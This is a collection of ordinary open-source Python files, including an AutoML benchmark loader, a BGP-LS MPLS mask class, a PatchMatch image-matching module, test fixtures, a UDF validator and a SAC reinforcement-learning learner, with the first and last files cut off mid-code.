return iter(p.stdout.readline, b'')
def runProcessAndReturnLastLine(exe):
p = subprocess.Popen(exe, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.stdout.readlines()[-1]
def backupDevices(bucket):
devices = ""
cmd = "mount -l -t " + supportedFS
for line in runProcess(cmd.split()):
line_arr = line.split()
folder = line_arr[2]
fstype = line_arr[4]
perms = line_arr[5]
if perms.find('w') != -1:
use = True
if fstype in localFS:
m = re.match('^(/media|/mnt)', folder)
if not m:
use = False
if use:
cmd2 = "df -h %s " % folder
df = runProcessAndReturnLastLine(cmd2.split())
avail = df.split()[2]
devices = devices + "<OPTION VALUE=\"" + folder + "\">" + folder + " (" + avail + " free, " + fstype + ")</option>"
return devices
|
amlb/benchmarks/file.py | pplonski/automlbenchmark | 282 | 9293 | <filename>amlb/benchmarks/file.py<gh_stars>100-1000
import logging
import os
from typing import List, Tuple, Optional
from amlb.utils import config_load, Namespace
log = logging.getLogger(__name__)
def _find_local_benchmark_definition(name: str, benchmark_definition_dirs: List[str]) -> str:
# 'name' should be either a full path to the benchmark,
# or a filename (without extension) in the benchmark directory.
if os.path.exists(name):
return name
for bd in benchmark_definition_dirs:
bf = os.path.join(bd, f"{name}.yaml")
if os.path.exists(bf):
# We don't account for duplicate definitions (yet).
return bf
# should we support s3 and check for s3 path before raising error?
raise ValueError(f"Incorrect benchmark name or path `{name}`, name not available in {benchmark_definition_dirs}.")
def load_file_benchmark(name: str, benchmark_definition_dirs: List[str]) -> Tuple[str, Optional[str], List[Namespace]]:
""" Loads benchmark from a local file. """
benchmark_file = _find_local_benchmark_definition(name, benchmark_definition_dirs)
log.info("Loading benchmark definitions from %s.", benchmark_file)
tasks = config_load(benchmark_file)
benchmark_name, _ = os.path.splitext(os.path.basename(benchmark_file))
return benchmark_name, benchmark_file, tasks
|
test/manual/documents/test_iter_documents.py | membranepotential/mendeley-python-sdk | 103 | 9305 | <gh_stars>100-1000
from itertools import islice
from test import get_user_session, cassette
from test.resources.documents import delete_all_documents, create_document
def test_should_iterate_through_documents():
session = get_user_session()
delete_all_documents()
with cassette('fixtures/resources/documents/iter_documents/iterate_through_documents.yaml'):
create_document(session, 'title 1')
create_document(session, 'title 2')
create_document(session, 'title 3')
docs = list(islice(session.documents.iter(page_size=2), 3))
assert len(docs) == 3
assert docs[0].title == 'title 1'
assert docs[1].title == 'title 2'
assert docs[2].title == 'title 3'
|
src/exabgp/bgp/message/update/attribute/bgpls/link/mplsmask.py | pierky/exabgp | 1,560 | 9319 | # encoding: utf-8
"""
mplsmask.py
Created by <NAME> on 2016-12-01.
Copyright (c) 2014-2017 Exa Networks. All rights reserved.
"""
from exabgp.bgp.message.notification import Notify
from exabgp.bgp.message.update.attribute.bgpls.linkstate import LinkState
from exabgp.bgp.message.update.attribute.bgpls.linkstate import FlagLS
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |L|R| Reserved |
# +-+-+-+-+-+-+-+-+
# https://tools.ietf.org/html/rfc7752#section-3.3.2.2 MPLS Protocol Mask
#
# +------------+------------------------------------------+-----------+
# | Bit | Description | Reference |
# +------------+------------------------------------------+-----------+
# | 'L' | Label Distribution Protocol (LDP) | [RFC5036] |
# | 'R' | Extension to RSVP for LSP Tunnels | [RFC3209] |
# | | (RSVP-TE) | |
# | 'Reserved' | Reserved for future use | |
# +------------+------------------------------------------+-----------+
# RFC 7752 3.3.2.2. MPLS Protocol Mask TLV
@LinkState.register()
class MplsMask(FlagLS):
REPR = 'MPLS Protocol mask'
JSON = 'mpls-mask'
TLV = 1094
FLAGS = ['LDP', 'RSVP-TE', 'RSV', 'RSV', 'RSV', 'RSV', 'RSV', 'RSV']
LEN = 1
|
image_analogy/losses/patch_matcher.py | kaldap/image-analogies | 3,722 | 9327 | import numpy as np
import scipy.interpolate
import scipy.ndimage
from sklearn.feature_extraction.image import extract_patches_2d, reconstruct_from_patches_2d
def _calc_patch_grid_dims(shape, patch_size, patch_stride):
x_w, x_h, x_c = shape
num_rows = 1 + (x_h - patch_size) // patch_stride
num_cols = 1 + (x_w - patch_size) // patch_stride
return num_rows, num_cols
def make_patch_grid(x, patch_size, patch_stride=1):
'''x shape: (num_channels, rows, cols)'''
x = x.transpose(2, 1, 0)
patches = extract_patches_2d(x, (patch_size, patch_size))
x_w, x_h, x_c = x.shape
num_rows, num_cols = _calc_patch_grid_dims(x.shape, patch_size, patch_stride)
patches = patches.reshape((num_rows, num_cols, patch_size, patch_size, x_c))
patches = patches.transpose((0, 1, 4, 2, 3))
#patches = np.rollaxis(patches, -1, 2)
return patches
def combine_patches_grid(in_patches, out_shape):
'''Reconstruct an image from these `patches`
input shape: (rows, cols, channels, patch_row, patch_col)
'''
num_rows, num_cols = in_patches.shape[:2]
num_channels = in_patches.shape[-3]
patch_size = in_patches.shape[-1]
num_patches = num_rows * num_cols
in_patches = np.reshape(in_patches, (num_patches, num_channels, patch_size, patch_size)) # (patches, channels, pr, pc)
in_patches = np.transpose(in_patches, (0, 2, 3, 1)) # (patches, p, p, channels)
recon = reconstruct_from_patches_2d(in_patches, out_shape)
return recon.transpose(2, 1, 0).astype(np.float32)
class PatchMatcher(object):
'''A matcher of image patches inspired by the PatchMatch algorithm.
image shape: (width, height, channels)
'''
def __init__(self, input_shape, target_img, patch_size=1, patch_stride=1, jump_size=0.5,
num_propagation_steps=5, num_random_steps=5, random_max_radius=1.0, random_scale=0.5):
self.input_shape = input_shape
self.patch_size = patch_size
self.patch_stride = patch_stride
self.jump_size = jump_size
self.num_propagation_steps = num_propagation_steps
self.num_random_steps = num_random_steps
self.random_max_radius = random_max_radius
self.random_scale = random_scale
self.num_input_rows, self.num_input_cols = _calc_patch_grid_dims(input_shape, patch_size, patch_stride)
self.target_patches = make_patch_grid(target_img, patch_size)
self.target_patches_normed = self.normalize_patches(self.target_patches)
self.coords = np.random.uniform(0.0, 1.0, # TODO: switch to pixels
(2, self.num_input_rows, self.num_input_cols))# * [[[self.num_input_rows]],[[self.num_input_cols]]]
self.similarity = np.zeros(input_shape[:2:-1], dtype=np.float32)
self.min_propagration_row = 1.0 / self.num_input_rows
self.min_propagration_col = 1.0 / self.num_input_cols
self.delta_row = np.array([[[self.min_propagration_row]], [[0.0]]])
self.delta_col = np.array([[[0.0]], [[self.min_propagration_col]]])
def update(self, input_img, reverse_propagation=False):
input_patches = self.get_patches_for(input_img)
self.update_with_patches(self.normalize_patches(input_patches), reverse_propagation=reverse_propagation)
def update_with_patches(self, input_patches, reverse_propagation=False):
self._propagate(input_patches, reverse_propagation=reverse_propagation)
self._random_update(input_patches)
def get_patches_for(self, img):
return make_patch_grid(img, self.patch_size);
def normalize_patches(self, patches):
norm = np.sqrt(np.sum(np.square(patches), axis=(2, 3, 4), keepdims=True))
return patches / norm
def _propagate(self, input_patches, reverse_propagation=False):
if reverse_propagation:
roll_direction = 1
else:
roll_direction = -1
sign = float(roll_direction)
for step_i in range(self.num_propagation_steps):
new_coords = self.clip_coords(np.roll(self.coords, roll_direction, 1) + self.delta_row * sign)
coords_row, similarity_row = self.eval_state(new_coords, input_patches)
new_coords = self.clip_coords(np.roll(self.coords, roll_direction, 2) + self.delta_col * sign)
coords_col, similarity_col = self.eval_state(new_coords, input_patches)
self.coords, self.similarity = self.take_best(coords_row, similarity_row, coords_col, similarity_col)
def _random_update(self, input_patches):
for alpha in range(1, self.num_random_steps + 1): # NOTE this should actually stop when the move is < 1
new_coords = self.clip_coords(self.coords + np.random.uniform(-self.random_max_radius, self.random_max_radius, self.coords.shape) * self.random_scale ** alpha)
self.coords, self.similarity = self.eval_state(new_coords, input_patches)
def eval_state(self, new_coords, input_patches):
new_similarity = self.patch_similarity(input_patches, new_coords)
delta_similarity = new_similarity - self.similarity
coords = np.where(delta_similarity > 0, new_coords, self.coords)
best_similarity = np.where(delta_similarity > 0, new_similarity, self.similarity)
return coords, best_similarity
def take_best(self, coords_a, similarity_a, coords_b, similarity_b):
delta_similarity = similarity_a - similarity_b
best_coords = np.where(delta_similarity > 0, coords_a, coords_b)
best_similarity = np.where(delta_similarity > 0, similarity_a, similarity_b)
return best_coords, best_similarity
def patch_similarity(self, source, coords):
'''Check the similarity of the patches specified in coords.'''
target_vals = self.lookup_coords(self.target_patches_normed, coords)
err = source * target_vals
return np.sum(err, axis=(2, 3, 4))
def clip_coords(self, coords):
# TODO: should this all be in pixel space?
coords = np.clip(coords, 0.0, 1.0)
return coords
def lookup_coords(self, x, coords):
x_shape = np.expand_dims(np.expand_dims(x.shape, -1), -1)
i_coords = np.round(coords * (x_shape[:2] - 1)).astype('int32')
return x[i_coords[0], i_coords[1]]
def get_reconstruction(self, patches=None, combined=None):
if combined is not None:
patches = make_patch_grid(combined, self.patch_size)
if patches is None:
patches = self.target_patches
patches = self.lookup_coords(patches, self.coords)
recon = combine_patches_grid(patches, self.input_shape)
return recon
def scale(self, new_shape, new_target_img):
'''Create a new matcher of the given shape and replace its
state with a scaled up version of the current matcher's state.
'''
new_matcher = PatchMatcher(new_shape, new_target_img, patch_size=self.patch_size,
patch_stride=self.patch_stride, jump_size=self.jump_size,
num_propagation_steps=self.num_propagation_steps,
num_random_steps=self.num_random_steps,
random_max_radius=self.random_max_radius,
random_scale=self.random_scale)
new_matcher.coords = congrid(self.coords, new_matcher.coords.shape, method='neighbour')
new_matcher.similarity = congrid(self.similarity, new_matcher.coords.shape, method='neighbour')
return new_matcher
def congrid(a, newdims, method='linear', centre=False, minusone=False):
'''Arbitrary resampling of source array to new dimension sizes.
Currently only supports maintaining the same number of dimensions.
To use 1-D arrays, first promote them to shape (x,1).
Uses the same parameters and creates the same co-ordinate lookup points
as IDL''s congrid routine, which apparently originally came from a VAX/VMS
routine of the same name.
method:
neighbour - closest value from original data
nearest and linear - uses n x 1-D interpolations using
scipy.interpolate.interp1d
(see Numerical Recipes for validity of use of n 1-D interpolations)
spline - uses ndimage.map_coordinates
centre:
True - interpolation points are at the centres of the bins
False - points are at the front edge of the bin
minusone:
For example- inarray.shape = (i,j) & new dimensions = (x,y)
False - inarray is resampled by factors of (i/x) * (j/y)
True - inarray is resampled by(i-1)/(x-1) * (j-1)/(y-1)
This prevents extrapolation one element beyond bounds of input array.
'''
if not a.dtype in [np.float64, np.float32]:
a = np.cast[float](a)
m1 = np.cast[int](minusone)
ofs = np.cast[int](centre) * 0.5
old = np.array( a.shape )
ndims = len( a.shape )
if len( newdims ) != ndims:
print("[congrid] dimensions error. " \
"This routine currently only support " \
"rebinning to the same number of dimensions.")
return None
newdims = np.asarray( newdims, dtype=float )
dimlist = []
if method == 'neighbour':
for i in range( ndims ):
base = np.indices(newdims)[i]
dimlist.append( (old[i] - m1) / (newdims[i] - m1) \
* (base + ofs) - ofs )
cd = np.array( dimlist ).round().astype(int)
newa = a[list( cd )]
return newa
elif method in ['nearest','linear']:
# calculate new dims
for i in range( ndims ):
base = np.arange( newdims[i] )
dimlist.append( (old[i] - m1) / (newdims[i] - m1) \
* (base + ofs) - ofs )
# specify old dims
olddims = [np.arange(i, dtype = np.float) for i in list( a.shape )]
# first interpolation - for ndims = any
mint = scipy.interpolate.interp1d( olddims[-1], a, kind=method )
newa = mint( dimlist[-1] )
trorder = [ndims - 1] + range( ndims - 1 )
for i in range( ndims - 2, -1, -1 ):
newa = newa.transpose( trorder )
mint = scipy.interpolate.interp1d( olddims[i], newa, kind=method )
newa = mint( dimlist[i] )
if ndims > 1:
# need one more transpose to return to original dimensions
newa = newa.transpose( trorder )
return newa
elif method in ['spline']:
oslices = [ slice(0,j) for j in old ]
oldcoords = np.ogrid[oslices]
nslices = [ slice(0,j) for j in list(newdims) ]
newcoords = np.mgrid[nslices]
newcoords_dims = range(np.rank(newcoords))
#make first index last
newcoords_dims.append(newcoords_dims.pop(0))
newcoords_tr = newcoords.transpose(newcoords_dims)
# makes a view that affects newcoords
newcoords_tr += ofs
deltas = (np.asarray(old) - m1) / (newdims - m1)
newcoords_tr *= deltas
newcoords_tr -= ofs
newa = scipy.ndimage.map_coordinates(a, newcoords)
return newa
else:
print("Congrid error: Unrecognized interpolation type.\n", \
"Currently only \'neighbour\', \'nearest\',\'linear\',", \
"and \'spline\' are supported.")
return None
if __name__ == '__main__':
import sys
import time
from scipy.misc import imsave
from image_analogy.img_utils import load_image, preprocess_image, deprocess_image
content_image_path, style_image_path, output_prefix = sys.argv[1:]
jump_size = 1.0
num_steps = 7
patch_size = 1
patch_stride = 1
feat_chans = 512
feat_style_shape = (feat_chans, 12, 18)
feat_style = np.random.uniform(0.0, 1.0, feat_style_shape)
feat_in_shape = (feat_chans, 17, 10)
feat_in = np.random.uniform(0.0, 1.0, feat_in_shape)
matcher = PatchMatcher(feat_in_shape[::-1], feat_style, patch_size=patch_size)
feat_in_normed = matcher.normalize_patches(matcher.get_patches_for(feat_in))
for i in range(num_steps):
matcher.update_with_patches(feat_in_normed)
r = matcher.get_reconstruction()
content_img_img = load_image(content_image_path)
content_n_channels, content_n_rows, content_n_cols = content_img_img.shape[::-1]
content_img = preprocess_image(content_img_img, content_n_cols, content_n_rows)[0]#.transpose((2,1,0))
style_img = load_image(style_image_path)
style_n_channels, style_n_rows, style_n_cols = content_img_img.shape[::-1]
style_img = preprocess_image(
load_image(style_image_path), style_n_cols, style_n_rows)[0]#.transpose((2,1,0))
pg = make_patch_grid(content_img, patch_size)
result = combine_patches_grid(pg, content_img.shape[::-1])
outimg = deprocess_image(result, contrast_percent=0)
imsave(output_prefix + '_bestre.png', outimg)
# # #
matcher = PatchMatcher((content_n_cols, content_n_rows, content_n_channels), style_img, patch_size=patch_size)
for i in range(num_steps):
start = time.time()
matcher.update(content_img, reverse_propagation=bool(i % 2))
print(matcher.similarity.min(), matcher.similarity.max(), matcher.similarity.mean())
end = time.time()
#print end-start
start = time.time()
result = matcher.get_reconstruction(patches=matcher.target_patches)
print(result.shape)
end = time.time()
print(end-start)
outimg = deprocess_image(result, contrast_percent=0)
# # imsave takes (rows, cols, channels)
imsave(output_prefix + '_best.png', outimg)
|
vnpy/gateway/rohon/__init__.py | funrunskypalace/vnpy | 323 | 9333 | from .rohon_gateway import RohonGateway
|
tests/unit/sagemaker/tensorflow/test_estimator_init.py | LastRemote/sagemaker-python-sdk | 1,690 | 9348 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from __future__ import absolute_import
from mock import Mock, patch
from packaging import version
import pytest
from sagemaker.tensorflow import TensorFlow
REGION = "us-west-2"
ENV_INPUT = {"env_key1": "env_val1", "env_key2": "env_val2", "env_key3": "env_val3"}
@pytest.fixture()
def sagemaker_session():
return Mock(name="sagemaker_session", boto_region_name=REGION)
def _build_tf(sagemaker_session, **kwargs):
return TensorFlow(
sagemaker_session=sagemaker_session,
entry_point="dummy.py",
role="dummy-role",
instance_count=1,
instance_type="ml.c4.xlarge",
**kwargs,
)
@patch("sagemaker.fw_utils.python_deprecation_warning")
def test_estimator_py2_deprecation_warning(warning, sagemaker_session):
estimator = _build_tf(sagemaker_session, framework_version="2.1.1", py_version="py2")
assert estimator.py_version == "py2"
warning.assert_called_with("tensorflow", "2.1.1")
def test_py2_version_deprecated(sagemaker_session):
with pytest.raises(AttributeError) as e:
_build_tf(sagemaker_session, framework_version="2.1.2", py_version="py2")
msg = (
"Python 2 containers are only available with 2.1.1 and lower versions. "
"Please use a Python 3 container."
)
assert msg in str(e.value)
def test_py2_version_is_not_deprecated(sagemaker_session):
estimator = _build_tf(sagemaker_session, framework_version="1.15.0", py_version="py2")
assert estimator.py_version == "py2"
estimator = _build_tf(sagemaker_session, framework_version="2.0.0", py_version="py2")
assert estimator.py_version == "py2"
def test_framework_name(sagemaker_session):
tf = _build_tf(sagemaker_session, framework_version="1.15.2", py_version="py3")
assert tf._framework_name == "tensorflow"
def test_tf_add_environment_variables(sagemaker_session):
tf = _build_tf(
sagemaker_session,
framework_version="1.15.2",
py_version="py3",
environment=ENV_INPUT,
)
assert tf.environment == ENV_INPUT
def test_tf_miss_environment_variables(sagemaker_session):
tf = _build_tf(
sagemaker_session,
framework_version="1.15.2",
py_version="py3",
environment=None,
)
assert not tf.environment
def test_enable_sm_metrics(sagemaker_session):
tf = _build_tf(
sagemaker_session,
framework_version="1.15.2",
py_version="py3",
enable_sagemaker_metrics=True,
)
assert tf.enable_sagemaker_metrics
def test_disable_sm_metrics(sagemaker_session):
tf = _build_tf(
sagemaker_session,
framework_version="1.15.2",
py_version="py3",
enable_sagemaker_metrics=False,
)
assert not tf.enable_sagemaker_metrics
def test_disable_sm_metrics_if_fw_ver_is_less_than_1_15(
sagemaker_session, tensorflow_training_version, tensorflow_training_py_version
):
if version.Version(tensorflow_training_version) > version.Version("1.14"):
pytest.skip("This test is for TF 1.14 and lower.")
tf = _build_tf(
sagemaker_session,
framework_version=tensorflow_training_version,
py_version=tensorflow_training_py_version,
image_uri="old-image",
)
assert tf.enable_sagemaker_metrics is None
def test_enable_sm_metrics_if_fw_ver_is_at_least_1_15(
sagemaker_session, tensorflow_training_version, tensorflow_training_py_version
):
if version.Version(tensorflow_training_version) < version.Version("1.15"):
pytest.skip("This test is for TF 1.15 and higher.")
tf = _build_tf(
sagemaker_session,
framework_version=tensorflow_training_version,
py_version=tensorflow_training_py_version,
)
assert tf.enable_sagemaker_metrics
def test_require_image_uri_if_fw_ver_is_less_than_1_11(
sagemaker_session, tensorflow_training_version, tensorflow_training_py_version
):
if version.Version(tensorflow_training_version) > version.Version("1.10"):
pytest.skip("This test is for TF 1.10 and lower.")
with pytest.raises(ValueError) as e:
_build_tf(
sagemaker_session,
framework_version=tensorflow_training_version,
py_version=tensorflow_training_py_version,
)
expected_msg = (
"TF {version} supports only legacy mode. Please supply the image URI directly with "
"'image_uri=520713654638.dkr.ecr.{region}.amazonaws.com/"
"sagemaker-tensorflow:{version}-cpu-py2' and set 'model_dir=False'. If you are using any "
"legacy parameters (training_steps, evaluation_steps, checkpoint_path, requirements_file), "
"make sure to pass them directly as hyperparameters instead."
).format(version=tensorflow_training_version, region=REGION)
assert expected_msg in str(e.value)
|
util/canonicaljson.py | giuseppe/quay | 2,027 | 9359 | <reponame>giuseppe/quay
import collections
def canonicalize(json_obj, preserve_sequence_order=True):
"""
This function canonicalizes a Python object that will be serialized as JSON.
Example usage: json.dumps(canonicalize(my_obj))
Args:
json_obj (object): the Python object that will later be serialized as JSON.
Returns:
object: json_obj now sorted to its canonical form.
"""
if isinstance(json_obj, collections.MutableMapping):
sorted_obj = sorted(
{
key: canonicalize(val, preserve_sequence_order) for key, val in json_obj.items()
}.items()
)
return collections.OrderedDict(sorted_obj)
elif isinstance(json_obj, (list, tuple)):
seq = [canonicalize(val, preserve_sequence_order) for val in json_obj]
return seq if preserve_sequence_order else sorted(seq)
return json_obj
|
external/model-preparation-algorithm/tests/conftest.py | opencv/openvino_training_extensions | 775 | 9370 | <reponame>opencv/openvino_training_extensions<filename>external/model-preparation-algorithm/tests/conftest.py
# Copyright (C) 2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
try:
import e2e.fixtures
from e2e.conftest_utils import * # noqa
from e2e.conftest_utils import pytest_addoption as _e2e_pytest_addoption # noqa
from e2e import config # noqa
from e2e.utils import get_plugins_from_packages
pytest_plugins = get_plugins_from_packages([e2e])
except ImportError:
_e2e_pytest_addoption = None
pass
import config
import pytest
from ote_sdk.test_suite.pytest_insertions import *
from ote_sdk.test_suite.training_tests_common import REALLIFE_USECASE_CONSTANT
pytest_plugins = get_pytest_plugins_from_ote()
ote_conftest_insertion(default_repository_name='ote/training_extensions/external/model-preparation-algorithm')
@pytest.fixture
def ote_test_domain_fx():
return 'model-preparation-algorithm'
@pytest.fixture
def ote_test_scenario_fx(current_test_parameters_fx):
assert isinstance(current_test_parameters_fx, dict)
if current_test_parameters_fx.get('usecase') == REALLIFE_USECASE_CONSTANT:
return 'performance'
else:
return 'integration'
@pytest.fixture(scope='session')
def ote_templates_root_dir_fx():
import os.path as osp
import logging
logger = logging.getLogger(__name__)
root = osp.dirname(osp.dirname(osp.realpath(__file__)))
root = f'{root}/configs/'
logger.debug(f'overloaded ote_templates_root_dir_fx: return {root}')
return root
@pytest.fixture(scope='session')
def ote_reference_root_dir_fx():
import os.path as osp
import logging
logger = logging.getLogger(__name__)
root = osp.dirname(osp.dirname(osp.realpath(__file__)))
root = f'{root}/tests/reference/'
logger.debug(f'overloaded ote_reference_root_dir_fx: return {root}')
return root
# pytest magic
def pytest_generate_tests(metafunc):
ote_pytest_generate_tests_insertion(metafunc)
def pytest_addoption(parser):
ote_pytest_addoption_insertion(parser)
|
ibis/udf/validate.py | rtpsw/ibis | 986 | 9371 | """Validation for UDFs.
Warning: This is an experimental module and API here can change without notice.
DO NOT USE DIRECTLY.
"""
from inspect import Parameter, Signature, signature
from typing import Any, Callable, List
import ibis.common.exceptions as com
from ibis.expr.datatypes import DataType
def _parameter_count(funcsig: Signature) -> int:
"""Get the number of positional-or-keyword or position-only parameters in a
function signature.
Parameters
----------
funcsig : inspect.Signature
A UDF signature
Returns
-------
int
The number of parameters
"""
return sum(
param.kind in {param.POSITIONAL_OR_KEYWORD, param.POSITIONAL_ONLY}
for param in funcsig.parameters.values()
if param.default is Parameter.empty
)
def validate_input_type(
input_type: List[DataType], func: Callable
) -> Signature:
"""Check that the declared number of inputs (the length of `input_type`)
and the number of inputs to `func` are equal.
If the signature of `func` uses *args, then no check is done (since no
check can be done).
Parameters
----------
input_type : List[DataType]
func : callable
Returns
-------
inspect.Signature
"""
funcsig = signature(func)
params = funcsig.parameters.values()
# We can only do validation if all the positional arguments are explicit
# (i.e. no *args)
if not any(param.kind is Parameter.VAR_POSITIONAL for param in params):
declared_parameter_count = len(input_type)
function_parameter_count = _parameter_count(funcsig)
if declared_parameter_count != function_parameter_count:
raise TypeError(
'Function signature {!r} has {:d} parameters, '
'input_type has {:d}. These must match. Non-column '
'parameters must be defined as keyword only, i.e., '
'def foo(col, *, function_param).'.format(
func.__name__,
function_parameter_count,
declared_parameter_count,
)
)
return funcsig
def validate_output_type(output_type: Any) -> None:
"""Check that the output type is a single datatype."""
if isinstance(output_type, list):
raise com.IbisTypeError(
'The output type of a UDF must be a single datatype.'
)
|
summary/summary_avail.py | bit0fun/plugins | 173 | 9395 | from datetime import datetime
# ensure an rpc peer is added
def addpeer(p, rpcpeer):
pid = rpcpeer['id']
if pid not in p.persist['peerstate']:
p.persist['peerstate'][pid] = {
'connected': rpcpeer['connected'],
'last_seen': datetime.now() if rpcpeer['connected'] else None,
'avail': 1.0 if rpcpeer['connected'] else 0.0
}
# exponetially smooth online/offline states of peers
def trace_availability(p, rpcpeers):
p.persist['availcount'] += 1
leadwin = max(min(p.avail_window, p.persist['availcount'] * p.avail_interval), p.avail_interval)
samples = leadwin / p.avail_interval
alpha = 1.0 / samples
beta = 1.0 - alpha
for rpcpeer in rpcpeers['peers']:
pid = rpcpeer['id']
addpeer(p, rpcpeer)
if rpcpeer['connected']:
p.persist['peerstate'][pid]['last_seen'] = datetime.now()
p.persist['peerstate'][pid]['connected'] = True
p.persist['peerstate'][pid]['avail'] = 1.0 * alpha + p.persist['peerstate'][pid]['avail'] * beta
else:
p.persist['peerstate'][pid]['connected'] = False
p.persist['peerstate'][pid]['avail'] = 0.0 * alpha + p.persist['peerstate'][pid]['avail'] * beta
|
openskill/statistics.py | CalColson/openskill.py | 120 | 9400 | <gh_stars>100-1000
import sys
import scipy.stats
normal = scipy.stats.norm(0, 1)
def phi_major(x):
return normal.cdf(x)
def phi_minor(x):
return normal.pdf(x)
def v(x, t):
xt = x - t
denom = phi_major(xt)
return -xt if (denom < sys.float_info.epsilon) else phi_minor(xt) / denom
def w(x, t):
xt = x - t
denom = phi_major(xt)
if denom < sys.float_info.epsilon:
return 1 if (x < 0) else 0
return v(x, t) * (v(x, t) + xt)
def vt(x, t):
xx = abs(x)
b = phi_major(t - xx) - phi_major(-t - xx)
if b < 1e-5:
if x < 0:
return -x - t
return -x + t
a = phi_minor(-t - xx) - phi_minor(t - xx)
return (-a if x < 0 else a) / b
def wt(x, t):
xx = abs(x)
b = phi_major(t - xx) - phi_major(-t - xx)
if b < sys.float_info.epsilon:
return 1.0
return ((t - xx) * phi_minor(t - xx) + (t + xx) * phi_minor(-t - xx)) / b + vt(
x, t
) * vt(x, t)
|
src/tools/pch.py | MaxSac/build | 11,356 | 9445 | # Status: Being ported by Steven Watanabe
# Base revision: 47077
#
# Copyright (c) 2005 <NAME>.
# Copyright 2006 <NAME>
# Copyright (c) 2008 <NAME>
#
# Use, modification and distribution is subject to the Boost Software
# License Version 1.0. (See accompanying file LICENSE_1_0.txt or
# http://www.boost.org/LICENSE_1_0.txt)
##### Using Precompiled Headers (Quick Guide) #####
#
# Make precompiled mypch.hpp:
#
# import pch ;
#
# cpp-pch mypch
# : # sources
# mypch.hpp
# : # requiremnts
# <toolset>msvc:<source>mypch.cpp
# ;
#
# Add cpp-pch to sources:
#
# exe hello
# : main.cpp hello.cpp mypch
# ;
from b2.build import type, feature, generators
from b2.tools import builtin
type.register('PCH', ['pch'])
type.register('C_PCH', [], 'PCH')
type.register('CPP_PCH', [], 'PCH')
# Control precompiled header (PCH) generation.
feature.feature('pch',
['on', 'off'],
['propagated'])
feature.feature('pch-header', [], ['free', 'dependency'])
feature.feature('pch-file', [], ['free', 'dependency'])
class PchGenerator(generators.Generator):
"""
Base PCH generator. The 'run' method has the logic to prevent this generator
from being run unless it's being used for a top-level PCH target.
"""
def action_class(self):
return builtin.CompileAction
def run(self, project, name, prop_set, sources):
if not name:
# Unless this generator is invoked as the top-most generator for a
# main target, fail. This allows using 'H' type as input type for
# this generator, while preventing Boost.Build to try this generator
# when not explicitly asked for.
#
# One bad example is msvc, where pch generator produces both PCH
# target and OBJ target, so if there's any header generated (like by
# bison, or by msidl), we'd try to use pch generator to get OBJ from
# that H, which is completely wrong. By restricting this generator
# only to pch main target, such problem is solved.
pass
else:
r = self.run_pch(project, name,
prop_set.add_raw(['<define>BOOST_BUILD_PCH_ENABLED']),
sources)
return generators.add_usage_requirements(
r, ['<define>BOOST_BUILD_PCH_ENABLED'])
# This rule must be overridden by the derived classes.
def run_pch(self, project, name, prop_set, sources):
pass
# NOTE: requirements are empty, default pch generator can be applied when
# pch=off.
generators.register(builtin.DummyGenerator(
"pch.default-c-pch-generator", False, [], ['C_PCH'], []))
generators.register(builtin.DummyGenerator(
"pch.default-cpp-pch-generator", False, [], ['CPP_PCH'], []))
|
tests/test_parse.py | vkleen/skidl | 700 | 9451 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
# The MIT License (MIT) - Copyright (c) 2016-2021 <NAME>.
import pytest
from skidl import netlist_to_skidl
from .setup_teardown import get_filename, setup_function, teardown_function
def test_parser_1():
netlist_to_skidl(get_filename("Arduino_Uno_R3_From_Scratch.net"))
|
jaxrl/agents/sac_v1/sac_v1_learner.py | anuragajay/jaxrl | 157 | 9481 | """Implementations of algorithms for continuous control."""
import functools
from typing import Optional, Sequence, Tuple
import jax
import jax.numpy as jnp
import numpy as np
import optax
from jaxrl.agents.sac import temperature
from jaxrl.agents.sac.actor import update as update_actor
from jaxrl.agents.sac.critic import target_update
from jaxrl.agents.sac_v1.critic import update_q, update_v
from jaxrl.datasets import Batch
from jaxrl.networks import critic_net, policies
from jaxrl.networks.common import InfoDict, Model, PRNGKey
@functools.partial(jax.jit, static_argnames=('update_target'))
def _update_jit(
rng: PRNGKey, actor: Model, critic: Model, value: Model,
target_value: Model, temp: Model, batch: Batch, discount: float,
tau: float, target_entropy: float, update_target: bool
) -> Tuple[PRNGKey, Model, Model, Model, Model, Model, InfoDict]:
new_critic, critic_info = update_q(critic, target_value, batch, discount)
rng, key = jax.random.split(rng)
new_actor, actor_info = update_actor(key, actor, new_critic, temp, batch)
rng, key = jax.random.split(rng)
new_value, value_info = update_v(key, new_actor, new_critic, value, temp,
batch, True)
if update_target:
new_target_value = target_update(new_value, target_value, tau)
else:
new_target_value = target_value
new_temp, alpha_info = temperature.update(temp, actor_info['entropy'],
target_entropy)
return rng, new_actor, new_critic, new_value, new_target_value, new_temp, {
**critic_info,
**value_info,
**actor_info,
**alpha_info
}
class SACV1Learner(object):
def __init__(self,
seed: int,
observations: jnp.ndarray,
actions: jnp.ndarray,
actor_lr: float = 3e-4,
value_lr: float = 3e-4,
critic_lr: float = 3e-4,
temp_lr: float = 3e-4,
hidden_dims: Sequence[int] = (256, 256),
discount: float = 0.99,
tau: float = 0.005,
target_update_period: int = 1,
target_entropy: Optional[float] = None,
init_temperature: float = 1.0):
"""
An implementation of the version of Soft-Actor-Critic described in https://arxiv.org/abs/1801.01290
"""
action_dim = actions.shape[-1]
if target_entropy is None:
self.target_entropy = -action_dim / 2
else:
self.target_entropy = target_entropy
self.tau = tau
self.target_update_period = target_update_period
self.discount = discount
rng = jax.random.PRNGKey(seed)
rng, actor_key, critic_key, temp_key = jax.random.split(rng, 4)
actor_def = policies.NormalTanhPolicy(hidden_dims, action_dim)
actor = Model.create(actor_def,
inputs=[actor_key, observations],
